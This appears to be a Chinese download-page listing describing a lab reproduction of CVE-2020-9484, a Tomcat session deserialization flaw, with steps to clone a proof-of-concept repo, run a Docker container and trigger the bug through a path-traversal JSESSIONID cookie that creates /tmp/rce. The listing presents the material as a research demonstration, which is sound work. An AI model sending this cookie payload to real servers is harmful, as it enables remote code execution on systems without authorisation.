
该漏洞(CVE-2020-9484)的源代码。
5星
- 浏览量: 0
- 大小:None
- 文件类型:None
简介:
CVE-2020-9484,针对Tomcat服务器的漏洞,仅供教育研究和学习目的使用。 详细的技术信息请参考提供的资料。 为了演示该漏洞的利用,可以按照以下步骤操作:首先,通过`git clone https://github.com/masahiro331/CVE-2020-9484.git`命令克隆漏洞代码仓库。 然后,进入 `CVE-2020-9484` 目录,并使用 `docker build -t tomcat:groovy` 命令构建 Docker 镜像。 接下来,通过 `docker run -d -p 8080:8080 tomcat:groovy` 命令运行 Docker 容器。 为了验证漏洞的存在,可以使用 `curl http://127.0.0.1:8080/index.jsp -H Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy` 命令发送请求。 随后,通过 `docker exec -it $CONTAINER /bin/sh` 命令进入容器的 shell 环境,并使用 `ls /tmp/rce` 命令列出 `/tmp` 目录下的文件和文件夹。
全部评论 (0)
还没有任何评论哟~


